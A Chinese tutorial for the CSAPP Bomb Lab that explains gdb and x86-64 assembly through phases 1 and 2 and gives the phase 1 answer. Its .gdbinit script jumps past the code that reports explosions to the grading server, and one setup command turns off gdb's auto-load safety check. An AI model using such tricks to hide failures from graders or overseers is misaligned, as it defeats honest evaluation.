在做这个 lab 之前,推荐安装 VS Code x86 and x86_64 Assembly 扩展,以获得汇编的语法高亮。

在 Bomb lab 里,我们需要拆除一系列的炸弹,每个炸弹都有一个密码,我们需要通过输入正确的密码来拆除炸弹。如果输入错误,炸弹就会爆炸,而每次爆炸,我们都会失去 0.5 分(上限 20 分)

所以,对于程序一无所知的我们,显然不能直接莽撞地直接去猜密码,而是需要借助拆弹工具 gdb 来帮忙防止爆炸,同时通过阅读源码和反编译出的汇编代码来分析程序的逻辑,从而找到正确的密码。

请注意,千万不要使用 gdb 工具直接修改寄存器或者跳转打断正常控制流,由于存在服务器远程校验,这样会导致本地过关,远程不过关且扣分的情况!

阅读源码

想要拆弹,肯定首先要阅读源码。这个 lab 的源码在 bomb.c 中,可以看到这个程序的主要逻辑大概是:

int main(int argc, char *argv[])
{
    // ...
    initialize_bomb();
    // ...
    input = read_line();
    phase_1(input);
    phase_defused(fp);
    printf("Phase 1 defused. How about the next one?\n");
    // ...
    return 0;
}

可以看到,这个程序的每个阶段都是通过 phase_x 函数来实现的,而 phase_x 函数的参数是 input,也就是我们输入的字符串。所以,我们的目标就是找到每个阶段的 input,然后通过分析 phase_x 函数来找到正确的 input

首先让我们来反编译一下整个 bomb 这个二进制程序:

objdump -d bomb > bomb.asm

阅读源码,我们发现每个 phase 都大概具有如下结构:

0000000000001778 <phase_1>:
    1778:	f3 0f 1e fa          	endbr64
    177c:	48 83 ec 08          	sub    $0x8,%rsp
    1780:	48 8d 35 79 2a 00 00 	lea    0x2a79(%rip),%rsi        # 4200 <_IO_stdin_used+0x200>
    1787:	e8 d3 05 00 00       	call   1d5f <strings_not_equal>
    178c:	85 c0                	test   %eax,%eax
    178e:	75 05                	jne    1795 <phase_1+0x1d>
    1790:	48 83 c4 08          	add    $0x8,%rsp
    1794:	c3                   	ret
    1795:	e8 28 09 00 00       	call   20c2 <explode_bomb>
    179a:	eb f4                	jmp    1790 <phase_1+0x18>

可以看到,每个 phase 内都有一个类似于 jne 的条件跳转指令,跳转到 explode_bomb 函数,也就是说,如果我们的输入不正确,就会引爆炸弹。那么,一个很重要的事情,就是在其真正进入引爆流程之前,我们一定要打断这个函数的执行。

这就需要使用到 gdb 工具了。

有关 gdb 的具体指令简介,在书上的 3.10.2 小节,我推荐大家在做 bomb lab 之前一定要提前看一下。

在此,我只介绍一些我在做这个 lab 时用到的一些指令。

| 指令 | 全称 | 描述 | | ----------- | ----- | ------------------------------------------------ | | r | run | 开始执行程序,直到下一个断点或程序结束 | | q | quit | 退出 GDB 调试器 | | ni | nexti | 执行下一条指令,但不进入函数内部 | | si | stepi | 执行当前指令,如果是函数调用则进入函数 | | b | break | 在指定位置设置断点 | | c | cont | 从当前位置继续执行程序,直到下一个断点或程序结束 | | p | print | 打印变量的值 | | x | | 打印内存中的值 | | j | jump | 跳转到程序指定位置 | | disas | | 反汇编当前函数或指定的代码区域 | | layout asm | | 显示汇编代码视图 | | layout regs | | 显示当前的寄存器状态和它们的值 |

我一般启动 gdb bomb 后,都会首先使用 layout asmlayout regs 开启视图,方便分析。

关闭 layout 的方式为,按下 Ctrl + x,然后再按下 a

关于 px,最重要的就是记得 p 命令用于打印表达式的值,而 x 命令则主要用于检查内存的内容。几个常用示例如下:

p $rax  # 打印寄存器 rax 的值
p $rsp  # 打印栈指针的值
p/x $rsp  # 打印栈指针的值,以十六进制显示
p/d $rsp  # 打印栈指针的值,以十进制显示

x/2x $rsp  # 以十六进制格式查看栈指针 %rsp 指向的内存位置 M[%rsp] 开始的两个单位。
x/2d $rsp # 以十进制格式查看栈指针 %rsp 指向的内存位置 M[%rsp] 开始的两个单位。
x/2c $rsp # 以字符格式查看栈指针 %rsp 指向的内存位置 M[%rsp] 开始的两个单位。
x/s $rsp # 把栈指针指向的内存位置 M[%rsp] 当作 C 风格字符串来查看。

x/b $rsp # 检查栈指针指向的内存位置 M[%rsp] 开始的 1 字节。
x/h $rsp # 检查栈指针指向的内存位置 M[%rsp] 开始的 2 字节(半字)。
x/w $rsp # 检查栈指针指向的内存位置 M[%rsp] 开始的 4 字节(字)。
x/g $rsp # 检查栈指针指向的内存位置 M[%rsp] 开始的 8 字节(双字)。

info registers  # 打印所有寄存器的值
info breakpoints  # 打印所有断点的信息

delete breakpoints 1  # 删除第一个断点,可以简写为 d 1

这些命令在 / 后面的后缀(如 2x2dsg20c)指定了查看内存的方式和数量。具体来说:

  • 第一个数字(如 220)指定要查看的单位数量。

  • 第二个字母(如 xdsgc)指定单位类型和显示格式,其中:

    • c / d / x 分别代表以字符 / 十进制 / 十六进制格式显示内存内容。

    • s 代表以字符串格式显示内存内容。

    • b / h / w / g 分别代表以 1 / 2 / 4 / 8 字节为单位(unit)显示内存内容。

      当使用 x/bx/hx/wx/g 时,unit 会保留对应改变,直到你再次使用这些命令。

安全化炸弹

一个随时会引爆的炸弹总是让人胆战心惊,但如果是一个安全的炸弹,那我们就可以放心地去拆弹了。

把炸弹安全化的方式有两种,它们都需要分析 objdump 反汇编出的代码,然后:

  • 找到相关代码,再利用 hexedit 工具修改二进制码,替换条件跳转指令或者使用 nop 无义指令替换危险指令。
  • 找到相关代码,再利用 gdb 工具为危险函数或者危险指令设置断点,并对于断点处进行编程,跳过危险指令或者修改寄存器的值来控制条件跳转,使得炸弹不会爆炸。

在此,我仅介绍第二种方法。

gdb 有一个很实用的功能,就是我们可以使用 .gdbinit 文件来设置 gdb 进入时的一些默认配置,这样我们就不用每次都手动输入一大堆的指令。

为了实现此功能,我们首先进行如下配置:

# 创建当前目录下的 .gdbinit 文件
touch .gdbinit
# 创建 .config/gdb 文件夹
mkdir -p ~/.config/gdb
# 允许 gdb 预加载根目录下所有的文件
echo "set auto-load safe-path /" > ~/.config/gdb/gdbinit

然后,我们打开工作目录的 .gdbinit 文件,输入如下内容:

# ./gdbinit
# 设置默认文件输入,这样我们不必每次手动输入答案
set args psol.txt

# 可以为 explode_bomb 函数设置断点,这样我们就可以在爆炸之前打断程序的执行
# 但是由于其会打印输出信息,所以后面有更具有针对性的设置,跳过信息发送函数
# 所以这里就不再设置断点了
# b explode_bomb

# 为各个 phase 函数设置断点,用以观察其执行过程
# 如果你做完了某个 phase,可以将其注释掉,这样就不会再进入该 phase 了
b phase_1
b phase_2
b phase_3
b phase_4
b phase_5
b phase_6

# 为校验函数设置断点
b phase_defused
# 为此断点编程
command
# 直接跳到返回语句处,跳过校验流程
jump *(phase_defused + 0x2A)
end


# 以下代码务必保留!!!

# 为 explode_bomb 中触发 send_msg 函数的地方设置断点
b *(explode_bomb + 0x44)
# 为此断点编程
command
# 直接跳到 exit 退出函数处,跳过发送信息流程
j *(explode_bomb + 0x81)
end

# 炸弹已经安全化,可以放心地拆弹了,开始运行程序
r

因为每年的炸弹可能不一样,所以授人以鱼不如授人以渔,我在此详细的介绍一下如何安全化炸弹的过程,请大家自行阅读自己的代码,调整其中的参数,以适配自己的炸弹。

炸弹的执行有如下流程:

首先,在开始时校验是否被本地化,如果检测到被本地化,则直接退出

int *fp = initialize_bomb();

if (*fp != SECRETTOKEN){
    printf("Don't try to make the bomb run on your local machine!(*/w\*)");
    return 0;
}

由于我们没有通过修改二进制码的方式来本地化炸弹,所以我们不需要处理这里,但还是给出一个跳过这个 if 语句的 gdb 调试方法供参考:

b *(main+0x2e)
command
j *(main+0xb0)
end

然后,在每个 phase 里检验是否输入了正确的密码,如果输入错误则调用 explode_bomb 函数,打印 BOOM!!!,并在其中调用 send_msg 函数,向服务器发送通知

000000000000211b <explode_bomb>:
    211b:	f3 0f 1e fa          	endbr64
    211f:	50                   	push   %rax
    2120:	58                   	pop    %rax
    2121:	48 83 ec 18          	sub    $0x18,%rsp
    2125:	64 48 8b 04 25 28 00 	mov    %fs:0x28,%rax
    212c:	00 00
    212e:	48 89 44 24 08       	mov    %rax,0x8(%rsp)
    2133:	31 c0                	xor    %eax,%eax
    2135:	48 8d 3d fa 25 00 00 	lea    0x25fa(%rip),%rdi        # 4736 <array.3497+0x336>
    213c:	e8 2f f1 ff ff       	call   1270 <puts@plt>
    2141:	48 8d 3d f7 25 00 00 	lea    0x25f7(%rip),%rdi        # 473f <array.3497+0x33f>
    2148:	e8 23 f1 ff ff       	call   1270 <puts@plt>
    214d:	c7 44 24 04 00 00 00 	movl   $0x0,0x4(%rsp)
    2154:	00
    2155:	48 8d 74 24 04       	lea    0x4(%rsp),%rsi
    215a:	bf 00 00 00 00       	mov    $0x0,%edi
    215f:	e8 4d fe ff ff       	call   1fb1 <send_msg>
    2164:	83 7c 24 04 01       	cmpl   $0x1,0x4(%rsp)
    2169:	74 20                	je     218b <explode_bomb+0x70>
    216b:	48 8d 35 6e 23 00 00 	lea    0x236e(%rip),%rsi        # 44e0 <array.3497+0xe0>
    2172:	bf 01 00 00 00       	mov    $0x1,%edi
    2177:	b8 00 00 00 00       	mov    $0x0,%eax
    217c:	e8 df f1 ff ff       	call   1360 <__printf_chk@plt>
    2181:	bf 08 00 00 00       	mov    $0x8,%edi
    2186:	e8 05 f2 ff ff       	call   1390 <exit@plt>
    218b:	48 8d 3d 96 23 00 00 	lea    0x2396(%rip),%rdi        # 4528 <array.3497+0x128>
    2192:	e8 d9 f0 ff ff       	call   1270 <puts@plt>
    2197:	bf 08 00 00 00       	mov    $0x8,%edi
    219c:	e8 ef f1 ff ff       	call   1390 <exit@plt>

我们的代码,通过在 call 1fb1 <send_msg> 这一句处设置断点,然后直接跳到 call 1390 <exit@plt> 这一句处,完整的跳过了 send_msg 函数的执行,从而使得服务器无从知道我们的炸弹爆炸了。

这对应我们的 .gdbinit 文件中的如下代码:

# 为 explode_bomb 中触发 send_msg 函数的地方设置断点
b *(explode_bomb + 0x44)
# 为此断点编程
command
# 直接跳到 exit 退出函数处,跳过发送信息流程
j *(explode_bomb + 0x81)
end

其中两个断点的计算方式为:

由于 explode_bomb 函数的地址为 0x211b,而 call send_msg 指令的地址为 0x215f,所以 call send_msg 指令的偏移量为 0x215f - 0x211b = 0x44

同理,call exit 函数的地址为 0x219c,所以 call exit 函数的偏移量为 0x219c - 0x211b = 0x81

或许你会问为什么不直接使用 b 0x215fb 0x219c 来设置断点?这是因为我们的炸弹每次运行的地址都不一样,所以我们需要使用相对地址来设置断点。而这点你会在后续学习第七章链接的时候有所了解,或者是在做下一个 Attack Lab 的时候就会知道了,这就是地址随机化(Address Space Layout Randomization,ASLR)。

最后,在每个 phase 里,如果输入正确,则调用 phase_defused 函数,同服务器进行通信,~~(同学学号报一下,给你加创新学分)~~,将你输入的字符串发送到服务器进行远程校验,避免你在本地使用 gdb 跳过 explode_bomb 函数的执行的情况。

0000000000002331 <phase_defused>:
    2331:	f3 0f 1e fa          	endbr64
    2335:	53                   	push   %rbx
    2336:	48 89 fb             	mov    %rdi,%rbx
    2339:	c7 07 00 00 00 00    	movl   $0x0,(%rdi)
    233f:	48 89 fe             	mov    %rdi,%rsi
    2342:	bf 01 00 00 00       	mov    $0x1,%edi
    2347:	e8 65 fc ff ff       	call   1fb1 <send_msg>
    234c:	83 3b 01             	cmpl   $0x1,(%rbx)
    234f:	75 0b                	jne    235c <phase_defused+0x2b>
    2351:	83 3d f4 61 00 00 06 	cmpl   $0x6,0x61f4(%rip)        # 854c <num_input_strings>
    2358:	74 22                	je     237c <phase_defused+0x4b>
    235a:	5b                   	pop    %rbx
    235b:	c3                   	ret
    235c:	48 8d 35 7d 21 00 00 	lea    0x217d(%rip),%rsi        # 44e0 <array.3497+0xe0>
    2363:	bf 01 00 00 00       	mov    $0x1,%edi
    2368:	b8 00 00 00 00       	mov    $0x0,%eax
    236d:	e8 ee ef ff ff       	call   1360 <__printf_chk@plt>
    2372:	bf 08 00 00 00       	mov    $0x8,%edi
    2377:	e8 14 f0 ff ff       	call   1390 <exit@plt>
    237c:	e8 f7 f2 ff ff       	call   1678 <genshin>
    2381:	85 c0                	test   %eax,%eax
    2383:	75 26                	jne    23ab <phase_defused+0x7a>
    2385:	48 8d 3d 7c 22 00 00 	lea    0x227c(%rip),%rdi        # 4608 <array.3497+0x208>
    238c:	e8 df ee ff ff       	call   1270 <puts@plt>
    2391:	48 8d 3d b0 22 00 00 	lea    0x22b0(%rip),%rdi        # 4648 <array.3497+0x248>
    2398:	e8 d3 ee ff ff       	call   1270 <puts@plt>
    239d:	48 8d 3d ec 22 00 00 	lea    0x22ec(%rip),%rdi        # 4690 <array.3497+0x290>
    23a4:	e8 c7 ee ff ff       	call   1270 <puts@plt>
    23a9:	eb af                	jmp    235a <phase_defused+0x29>
    23ab:	e8 55 f3 ff ff       	call   1705 <qidong>
    23b0:	85 c0                	test   %eax,%eax
    23b2:	74 24                	je     23d8 <phase_defused+0xa7>
    23b4:	48 8d 3d 95 21 00 00 	lea    0x2195(%rip),%rdi        # 4550 <array.3497+0x150>
    23bb:	e8 b0 ee ff ff       	call   1270 <puts@plt>
    23c0:	48 8d 3d b1 21 00 00 	lea    0x21b1(%rip),%rdi        # 4578 <array.3497+0x178>
    23c7:	e8 a4 ee ff ff       	call   1270 <puts@plt>
    23cc:	b8 00 00 00 00       	mov    $0x0,%eax
    23d1:	e8 90 f8 ff ff       	call   1c66 <secret_phase>
    23d6:	eb ad                	jmp    2385 <phase_defused+0x54>
    23d8:	48 8d 3d d9 21 00 00 	lea    0x21d9(%rip),%rdi        # 45b8 <array.3497+0x1b8>
    23df:	e8 8c ee ff ff       	call   1270 <puts@plt>
    23e4:	eb 9f                	jmp    2385 <phase_defused+0x54>

类似于上面的修改,我们的代码通过在进入 phase_defused 函数的第一句话处设置断点,然后直接跳到 ret 这一句处,避免了同服务器的通信:

# 为校验函数设置断点
b phase_defused
# 为此断点编程
command
# 直接跳到返回语句处,跳过校验流程
jump *(phase_defused + 0x2A)
end

其中,断点的计算方式为:

由于 phase_defused 函数的地址为 0x2331,而 ret 指令的地址为 0x235b,所以 ret 指令的偏移量为 0x235b - 0x2331 = 0x2A

这里的跳转其实似乎并不是必要的,我在这里必须使用这段跳转的原因是我是在 DDL 已经过了情况下重新做这个 lab 写教程的,此时测评服务器已经拒绝接收 Bomb lab 的任何请求,所以如果不加这段会报 HTTP 错误,进而导致整个程序退出。

而如果你是在 DDL 之前做这个 lab,那么你完全不需要这段代码,因为将你的输入发送到服务器进行远程校验正是你所需要的。

当然,如果你不放心,你也可以将之加入到你的 .gdbinit 中,只不过你会缺少成功拆弹的提示,只能凭借运行逻辑来判断是否成功拆弹罢了。

注:尽管 phase_defused 函数内有调用 send_msg 函数,但是我们并没有修改 send_msg 函数的执行,而是在炸弹爆炸(即触发 explode_bomb)了的时候,跳过了 send_msg 函数的执行,所以这里的 send_msg 函数仍然会被正常执行,不用担心。反之,在炸弹爆炸的情况下,其会跳转并调用 exit 函数,所以也不会运行到 phase_defused 函数处。

启动拆弹:

# 启动 gdb,同时加载 bomb 这个程序
gdb bomb
# Breakpoint 1, 0x0000561abc562798 in phase_1 ()
# 继续运行(continue)
c
# Breakpoint 2, 0x0000561abc5627bc in phase_2 ()
c

当你完成上述一切操作的时候,你应该就能获得如下的效果:

safety-bomb

注:这里输入的 psol.txt 中,phase 1 的答案正确,而 phase 2 的答案错误。

于是我们可以看到,我们的炸弹现在即使被引爆,也不会通知到服务器(不然我这个超过 DDL 的尝试会直接导致程序终止),这下我们就可以放心地去拆弹了(而且但它依然能正确的打印爆炸信息供我们识别!)。

Phase 1

首先,我们通过查找 bomb.asm,找到反编译出的 phase_1 函数的代码,然后阅读一下:

00000000000014e9 <main>:
    ...
    15b1:	e8 30 0c 00 00       	call   21e6 <read_line>
    15b6:	48 89 c7             	mov    %rax,%rdi
    15b9:	e8 da 01 00 00       	call   1798 <phase_1>
    15be:	48 89 df             	mov    %rbx,%rdi
    ...

0000000000001798 <phase_1>:
    1798:	f3 0f 1e fa          	endbr64
    179c:	48 83 ec 08          	sub    $0x8,%rsp
    17a0:	48 8d 35 69 2a 00 00 	lea    0x2a69(%rip),%rsi        # 4210 <_IO_stdin_used+0x210>
    17a7:	e8 0c 06 00 00       	call   1db8 <strings_not_equal>
    17ac:	85 c0                	test   %eax,%eax
    17ae:	75 05                	jne    17b5 <phase_1+0x1d>
    17b0:	48 83 c4 08          	add    $0x8,%rsp
    17b4:	c3                   	ret
    17b5:	e8 61 09 00 00       	call   211b <explode_bomb>
    17ba:	eb f4                	jmp    17b0 <phase_1+0x18>

考虑到这是大多数同学接触到的第一段汇编代码,所以我在此详细地介绍一下这段代码的含义。

  1. endbr64:一句无关紧要的指令,用于防止 ROP 攻击,我们可以忽略它。

  2. sub $0x8,%rsp:将栈指针(%rsp)向下移动 8 个字节,使得栈帧 16 字节对齐。

  3. lea 0x2a69(%rip),%rsi:正如书上所提到的,leaq 指令全称为 load effective address,加载有效地址,但它并不会真的去访存然后再反算地址,它就是简单的把计算出来的地址放到你所需要的地方,所以它经常被用于做一些计算。

    这里的 lea 指令的含义是,将内存 0x2a69(%rip) 处的地址(也就是 0x2a69 + 0x17a7 = 0x4210)赋值给 %rsi。注意 %rip 这个东西的值不是它所处的这行代码的地址,而是下一条!同时,%rsi 代表的是函数运行的第二个参数。

    为什么 %rip 的值不是它所处的这行代码的地址,而是下一条?

    当你学完第四章处理器体系结构的时候,你就会知道。

    在这里做个简要的说明就是,当 CPU 读取并执行这条指令的时候,由于它已经读取完这条指令,所以 %rip 程序计数器的值已经指向了下一条指令的地址,而不是这条指令的地址。

  4. call 1db8 <strings_not_equal>:调用 strings_not_equal 函数。也即首先将 %rip 的值(也就是下一条指令的值,0x17ac)压入栈中,然后跳转到 strings_not_equal 函数的地址处执行。注意这里由于我们从 main 函数到这里一直没有修改 %rdi (也就是存放第一个参数的寄存器)的值,所以我们传入的第一个参数实际上是 mainread_line 函数的返回值(见 0x15b6 处),也就是我们输入的字符串的地址。而第二个参数就是我们上一条指令传入的 %rsi,它的内容也是一个地址,指向内存 0x2a69 的位置。

  5. test %eax,%eax:将 %eax 寄存器的值与其自身进行与运算,然后将结果存入 %eax。并且同时设置条件码(Condition Code),其中有一个叫做 ZF 的标志位,如果 %eax 的值为 0,则 ZF 为 1,否则为 0。

  6. jne 17b5 <phase_1+0x1d>jne 指令在上一条指令结果非 0 的情况下跳转,其具体的判断条件为 ZF = 0(这里可以参照书 P135 页,或者 3.6.1 章条件码),也就是说,如果 ZF 为 0(这对应我们调用 strings_not_equal 返回了一个非零值,代表我们没能成功匹配),则跳转到 0x17b5 的地方,也就是 call explode_bomb 的语句,进而引爆炸弹。

  7. add $0x8,%rsp:只有当上一条指令没有跳走的情况下才会执行(这代表我们答对了)。将栈指针(%rsp)向上移动 8 个字节,恢复栈指针的位置。

  8. ret:返回,将栈顶的值(也就是 0x17ac)赋值给 %rip,再将栈指针向上移动 8 个字节,恢复栈指针的位置,然后跳转到 %rip 所指向的地址处继续执行。相当于 phase_1 这个函数执行完毕,返回到 main 函数的 0x15be 处继续执行。

  9. call 211b <explode_bomb>:调用 explode_bomb 函数,也是首先将 %rip 的值(也就是下一条指令的值,0x17ba)压入栈中,然后跳转到 explode_bomb 函数的地址处执行。当 explode_bomb 函数执行完毕后,会返回到下一条指令,也即 0x17ba 处继续执行。

  10. jmp 17b0 <phase_1+0x18>:无条件跳转到 0x17b0 处,即进入(7)处,完成 phase_1 的退出流程,还原栈针,返回。

这里写的真的很细碎,但我还是觉得对于初学者而言可能恰恰需要的就是这种细碎的解释,所以如果你觉得你掌握的很好了,那你随便扫两眼就行了。

所以,我们得到了解决这个 phase 的关键信息,就是我们要使用 gdb 在执行 call strings_not_equal 之前,获取到 %rsi 的值(也就是正确答案),就可以了。

首先我们打开 psol.txt,随便输入一行字符串,比如

pku is better than thu

然后,我们打开 gdb,并且设置断点:

gdb bomb
# 先前的安全化操作,会自动使用 run 开始执行程序
# ...
# Breakpoint 1, 0x0000561abc562798 in phase_1 ()
# 打开 layout asm,可以看到反汇编出的代码
layout asm
# 在 call strings_not_equal 这句指令处(还未执行)设置断点
# 此时,上一条指令 leaq 已经执行完毕,%rsi 的值已经被赋值
# 也可以用 b *0x55ad99afc7a7 直接在具体的指令地址处设定断点
# 但是你会发现每次运行的时候,这个地址都不一样,都得重新复制黏贴一遍,所以还是用这种方式比较方便
b *(phase_1+15)
# 继续执行,会在上面设置的断点处停下来
c
# 打印 %rsi 指向的内存处的字符串
x/s $rsi

运行截图如下:

phase1

从而我们得到了 phase 1 的正确答案:

Catherine Earnshaw, may you not rest as long as I am living.

使用两次 Ctrl+D (这标志着我们的输入结束,即 EOF )退出 gdb,然后将正确答案写入到 psol.txt 第一行:

Catherine Earnshaw, may you not rest as long as I am living.
pku is better than thu

然后重新运行程序:

gdb bomb
# Breakpoint 1, 0x0000557197168798 in phase_1 ()
# 我们已经有正确答案了,直接使用 finish 执行到 phase_1 函数返回
finish
# 继续执行 phase_defused 函数
c

phase1-finish

可以发现我们已经正常的从 phase_1 函数返回了,而没有进入 send_msg 函数,而是返回到 bomb.c 中的下一句 phase_defused 函数的执行处了。这就代表我们已经成功的完成了 phase 1。

由于我为了规避服务器超期检查,使用 gdb 跳过了 phase_defused 函数的执行,但你们如果前面没有做这个操作而是正常执行的话,那么服务器应该就会收到你的答案并更新 AutoLab 的成绩了。

可以看到,继续执行后就进入了 phase 2。

Phase 2

依旧是先找到 phase_2 函数的代码:

00000000000017bc <phase_2>:
    17bc:	f3 0f 1e fa          	endbr64
    17c0:	53                   	push   %rbx
    17c1:	48 83 ec 20          	sub    $0x20,%rsp
    17c5:	64 48 8b 04 25 28 00 	mov    %fs:0x28,%rax
    17cc:	00 00
    17ce:	48 89 44 24 18       	mov    %rax,0x18(%rsp)
    17d3:	31 c0                	xor    %eax,%eax
    17d5:	48 89 e6             	mov    %rsp,%rsi
    17d8:	e8 c4 09 00 00       	call   21a1 <read_six_numbers>
    17dd:	83 3c 24 01          	cmpl   $0x1,(%rsp)
    17e1:	75 07                	jne    17ea <phase_2+0x2e>
    17e3:	bb 01 00 00 00       	mov    $0x1,%ebx
    17e8:	eb 0f                	jmp    17f9 <phase_2+0x3d>
    17ea:	e8 2c 09 00 00       	call   211b <explode_bomb>
    17ef:	eb f2                	jmp    17e3 <phase_2+0x27>
    17f1:	e8 25 09 00 00       	call   211b <explode_bomb>
    17f6:	83 c3 01             	add    $0x1,%ebx
    17f9:	83 fb 05             	cmp    $0x5,%ebx
    17fc:	7f 14                	jg     1812 <phase_2+0x56>
    17fe:	48 63 d3             	movslq %ebx,%rdx
    1801:	8d 43 ff             	lea    -0x1(%rbx),%eax
    1804:	48 98                	cltq
    1806:	8b 04 84             	mov    (%rsp,%rax,4),%eax
    1809:	01 c0                	add    %eax,%eax
    180b:	39 04 94             	cmp    %eax,(%rsp,%rdx,4)
    180e:	74 e6                	je     17f6 <phase_2+0x3a>
    1810:	eb df                	jmp    17f1 <phase_2+0x35>
    1812:	48 8b 44 24 18       	mov    0x18(%rsp),%rax
    1817:	64 48 33 04 25 28 00 	xor    %fs:0x28,%rax
    181e:	00 00
    1820:	75 06                	jne    1828 <phase_2+0x6c>
    1822:	48 83 c4 20          	add    $0x20,%rsp
    1826:	5b                   	pop    %rbx
    1827:	c3                   	ret
    1828:	e8 63 fa ff ff       	call   1290 <__stack_chk_fail@plt>

其实这段代码对于如今的我而言已经是非常简单的了,尽管我尽可能地以初学者的角度讲述,但是我还是可能会忘记一些当时的困惑,所以如果你有任何问题,欢迎在评论区或者 issue 中提出。

直接对着反汇编出来的代码在脑子里空想可能并不是一个很好的办法(除非你真的可以用你的大脑模拟出一台计算机来),所以我建议你找一张纸或者在 iPad 上用 GoodNotes 之类的软件画一下这段代码的流程图,并一行一行地标注,大概了解其运行逻辑后,再结合 gdb 来调试,我当时的笔记大概就长这样:

phase2-notes

我们首先来阅读 phase_2 函数的代码。

00000000000017bc <phase_2>:
    17bc:	f3 0f 1e fa          	endbr64
    17c0:	53                   	push   %rbx
    17c1:	48 83 ec 20          	sub    $0x20,%rsp
    17c5:	64 48 8b 04 25 28 00 	mov    %fs:0x28,%rax                # 读取金丝雀值
    17cc:	00 00
    17ce:	48 89 44 24 18       	mov    %rax,0x18(%rsp)              # 将金丝雀值保存到栈中
    ...
    1812:	48 8b 44 24 18       	mov    0x18(%rsp),%rax
    1817:	64 48 33 04 25 28 00 	xor    %fs:0x28,%rax                # 校验金丝雀值
    181e:	00 00
    1820:	75 06                	jne    1828 <phase_2+0x6c>
    1822:	48 83 c4 20          	add    $0x20,%rsp
    1826:	5b                   	pop    %rbx
    1827:	c3                   	ret
    1828:	e8 63 fa ff ff       	call   1290 <__stack_chk_fail@plt>

这一段代码是一个很典型的函数开头,使用 endbr64 来防止 ROP 攻击,然后压栈 %rbx

回忆一下, %rbx 是一个被调用者保存的寄存器,除了 %rbx 之外还有 %rbp%r12%r15,你可以通过 %rbx%rbp 中的 b 是 Backup 的首字母来记忆,另外再强记一下 %r12%r15 就行了。

接着再将 %rsp 栈针减去 0x20(注意是十六进制,也就是 32 个字节)扩大栈,然后使用 mov %fs:0x28,%rax%fs 段寄存器中的 0x28 处的值(也就是 0x28 + %fs 处的值)赋值给 %rax,再复制到栈指针往上 24 个字节处(也就是 %rsp + 0x18 处)存储起来。

这代表了一个你在后续 Attack lab 中会遇到的东西,叫做 “金丝雀值(Canary Value)”,用于防止缓冲区溢出攻击(Buffer Overflow Attack)。这个值会在函数的结尾处进行校验,如果发现被修改了,就会抛出异常,阻止程序继续执行。

我们也可以看到,在函数的结尾处,会将 %fs 段寄存器中的 0x28 处的值(也就是 0x28 + %fs 处的值)赋值给 %rax,然后与之前保存在栈中的金丝雀值进行异或运算,如果结果不为 0,则说明金丝雀值被修改了,就会抛出异常,阻止程序继续执行(call 1290 <__stack_chk_fail@plt> 一句)。

为什么要使用 fs 段寄存器?

这是因为 fs 段寄存器是一个特殊的寄存器,它的值是由操作系统决定的,而不是由程序决定的,所以它的值是不会被修改的,这样就可以防止被恶意修改。

    17d3:	31 c0                	xor    %eax,%eax                    # 将 %eax 置零
    17d5:	48 89 e6             	mov    %rsp,%rsi                    # 将栈指针的值赋值给 %rsi
    17d8:	e8 c4 09 00 00       	call   21a1 <read_six_numbers>      # 调用 read_six_numbers 函数,读取六个数字
    17dd:	83 3c 24 01          	cmpl   $0x1,(%rsp)                  # 比较第一个数字是否为 1
    17e1:	75 07                	jne    17ea <phase_2+0x2e>          # 如果不是,跳转到 17ea 处,启动爆炸
    17e3:	bb 01 00 00 00       	mov    $0x1,%ebx                    # 将 %ebx 置 1
    17e8:	eb 0f                	jmp    17f9 <phase_2+0x3d>          # 跳转到 17f9 处,这是一个初始化的特判过程
    17ea:	e8 2c 09 00 00       	call   211b <explode_bomb>          # 爆炸,是 17e1 处的跳转目标
    17ef:	eb f2                	jmp    17e3 <phase_2+0x27>          # 跳转到 17e3 处,从而使得 %ebx 被置 1
    17f1:	e8 25 09 00 00       	call   211b <explode_bomb>          # 爆炸,是 17f9 处的跳转目标
    17f6:	83 c3 01             	add    $0x1,%ebx                    # 将 %ebx 加 1,作为循环中改变的变量
    17f9:	83 fb 05             	cmp    $0x5,%ebx                    # 比较 %ebx 是否为 5
    17fc:	7f 14                	jg     1812 <phase_2+0x56>          # 如果大于 5,跳转到 1812 处(这里未列出),也即进入函数结尾的金丝雀值校验过程
    17fe:	48 63 d3             	movslq %ebx,%rdx                    # 将 %ebx 的值赋值给 %rdx(使用符号扩展)
    1801:	8d 43 ff             	lea    -0x1(%rbx),%eax              # 将 %eax 赋值为 %ebx - 1
    1804:	48 98                	cltq                                # 将 %eax 的值赋值给 %rax(符号扩展到 64 位)
    1806:	8b 04 84             	mov    (%rsp,%rax,4),%eax           # 读出内存地址 %rsp + %rax * 4 处的值,赋值给 %eax
    1809:	01 c0                	add    %eax,%eax                    # 将 %eax 的值加到自身上,也就是乘 2
    180b:	39 04 94             	cmp    %eax,(%rsp,%rdx,4)           # 比较 %rsp + %rdx * 4 处的值(注意这里是 %rdx,是没有改变的循环变量)与 %eax 的值
    180e:	74 e6                	je     17f6 <phase_2+0x3a>          # 如果相等,跳转到 17f6 处,也即循环继续
    1810:	eb df                	jmp    17f1 <phase_2+0x35>          # 如果不相等,跳转到 17f1 处,也即爆炸

这段代码是 phase_2 的核心语句。我为它添加了额外的注释,希望能够方便大家理解。

这段代码是很经典的汇编循环语句,通过维护一个循环变量 %ebx,来控制循环的次数与计算每次访存的地址,它很类似于下面的 C 语言代码:

int phase_2(int *rsp) {
    for (int ebx = 1; ebx <= 5; ebx++) {
        edx = ebx;
        eax = rsp[ebx - 1];
        eax *= 2;
        if (eax != rsp[ebx]) {
            explode_bomb();
        }
    }
    return 1;
}

注意一个 int 类型需要 4 个字节来存储,这就是为什么我们计算变址的时候要乘以比例因子 4。

尽管我们现在已经知道了核心的代码逻辑,但是我们还有一件事情不确定,那就是 read_six_numbers 函数的具体实现。它决定了读入的六个数字是如何被存储的,所以我们还是需要阅读一下它的代码:

00000000000021a1 <read_six_numbers>:
    21a1:	f3 0f 1e fa          	endbr64
    21a5:	48 83 ec 08          	sub    $0x8,%rsp                    # 扩大栈空间
    21a9:	48 89 f2             	mov    %rsi,%rdx                    # 将 %rsi 的值赋给 %rdx
    21ac:	48 8d 4e 04          	lea    0x4(%rsi),%rcx               # 计算 %rsi+4 的地址,存入 %rcx
    21b0:	48 8d 46 14          	lea    0x14(%rsi),%rax              # 计算 %rsi+20 的地址(也就是偏移 5 个 int),存入 %rax
    21b4:	50                   	push   %rax                         # 将 %rax 的值压栈
    21b5:	48 8d 46 10          	lea    0x10(%rsi),%rax              # 计算 %rsi+16 的地址,存入 %rax
    21b9:	50                   	push   %rax                         # 将 %rax 的值压栈
    21ba:	4c 8d 4e 0c          	lea    0xc(%rsi),%r9                # 计算 %rsi+12 的地址,存入 %r9
